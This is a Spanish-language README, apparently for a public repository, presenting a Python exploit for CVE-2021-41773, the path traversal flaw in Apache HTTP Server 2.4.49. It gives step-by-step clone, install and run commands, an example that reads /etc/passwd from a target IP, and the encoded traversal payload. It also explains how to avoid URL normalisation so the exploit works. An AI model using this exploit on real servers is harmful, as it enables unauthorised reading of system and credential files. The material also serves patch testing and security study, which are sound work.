
Exploit en Python para CVE-2021-41773 - Apache HTTP Server 2.4.49 vulnerabilidad de Path Traversal
Un exploit en Python para CVE-2021-41773, una vulnerabilidad de path traversal en Apache HTTP Server 2.4.49 que permite leer archivos arbitrarios del servidor.
CVE-2021-41773 es una vulnerabilidad de path traversal en Apache HTTP Server 2.4.49 que ocurre debido a una validación incorrecta de las rutas proporcionadas por el usuario. La vulnerabilidad permite a los atacantes leer archivos fuera de la raíz de documentos utilizando secuencias de path traversal codificadas en URL.
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt
python3 cve-2021-41773.py -t <target> -f <file_path>
-t, --target: URL objetivo (incluir protocolo y puerto si es necesario)-f, --file: Ruta del archivo a leer del servidor# Leer /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

El exploit utiliza secuencias de path traversal codificadas en URL (.%2e/%2e%2e/) para eludir la validación de ruta de Apache:
.%2e) evitan las comprobaciones de seguridad inicialesLa clave es usar urllib3.PoolManager() en lugar de requests.get() para evitar la normalización automática de URL que rompería el exploit.
# La estructura de la URL del exploit:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{archivo_objetivo}
Esto se traduce en:
/cgi-bin/../../../../{archivo_objetivo}